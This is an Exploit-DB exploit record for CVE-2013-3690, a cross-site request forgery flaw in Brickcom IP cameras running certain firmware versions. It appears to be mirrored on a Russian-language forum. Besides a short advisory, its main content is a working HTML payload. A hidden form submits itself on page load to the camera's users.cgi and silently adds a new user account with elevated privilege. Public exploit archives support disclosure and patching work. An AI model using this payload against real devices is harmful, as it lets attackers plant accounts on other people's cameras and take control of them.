- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 38582
- Проверка EDB
-
- Пройдено
- Автор
- CASTILLO
- Тип уязвимости
- REMOTE
- Платформа
- HARDWARE
- CVE
- cve-2013-3690
- Дата публикации
- 2013-06-12
Brickcom Multiple IP Cameras - Cross-Site Request Forgery
HTML:
source: https://www.securityfocus.com/bid/60526/info
Brickcom multiple IP cameras are prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
Brickcom cameras running firmware 3.0.6.7, 3.0.6.12, and 3.0.6.16C1 are vulnerable; other versions may also be affected.
<html>
<body>
<form name="gobap" action="http://xx.xx.xx.xx/cgi-bin/users.cgi"; method="POST">
<input type="hidden" name="action" value="add">
<input type="hidden" name="index" value="0">
<input type="hidden" name="username" value="test2">
<input type="hidden" name="password" value="test2">
<input type="hidden" name="privilege" value="1">
<script>document.gobap.submit();</script>
</form>
</body>
</html>- Источник
- www.exploit-db.com
